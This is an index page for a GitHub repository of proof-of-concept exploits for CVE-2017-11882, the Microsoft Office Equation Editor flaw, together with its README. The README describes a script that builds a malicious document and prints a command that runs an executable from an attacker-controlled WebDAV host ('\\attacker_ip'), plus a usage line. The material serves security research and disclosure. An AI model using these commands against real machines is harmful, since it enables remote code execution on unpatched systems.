Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/embedi/CVE-2017-11882
Proof-of-Concept exploits for CVE-2017-11882
https://github.com/embedi/CVE-2017-11882
Last synced: 22 days ago
JSON representation
Proof-of-Concept exploits for CVE-2017-11882
- Host: GitHub
- URL: https://github.com/embedi/CVE-2017-11882
- Owner: embedi
- Created: 2017-11-20T16:35:30.000Z (about 7 years ago)
- Default Branch: master
- Last Pushed: 2017-11-29T16:13:23.000Z (about 7 years ago)
- Last Synced: 2024-08-05T17:41:04.573Z (4 months ago)
- Language: Python
- Size: 4.88 KB
- Stars: 496
- Watchers: 39
- Forks: 197
- Open Issues: 5
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - embedi/CVE-2017-11882 - Proof-of-Concept exploits for CVE-2017-11882 (Python)
README
# CVE-2017-11882
CVE-2017-11882:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882MITRE CVE-2017-11882:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882Research:
https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-aboutPatch analysis:
https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.htmlDEMO PoC exploitation:
https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410# webdav_exec CVE-2017-11882
A simple PoC for CVE-2017-11882.
This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server.
The reason why this approach might be handy is a limitation of executed command length.
However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine.
This script creates simple document with several OLE objects.
These objects exploits CVE-2017-11882, which results in sequential command execution.The first command which triggers WebClient service start may look like this:
```
cmd.exe /c start \\attacker_ip\ff
```Attacker controlled binary path should be a UNC network path:
```
\\attacker_ip\ff\1.exe
```## Usage
```python
webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name
```# Sample exploit for CVE-2017-11882 (starting calc.exe as payload)
`example` folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.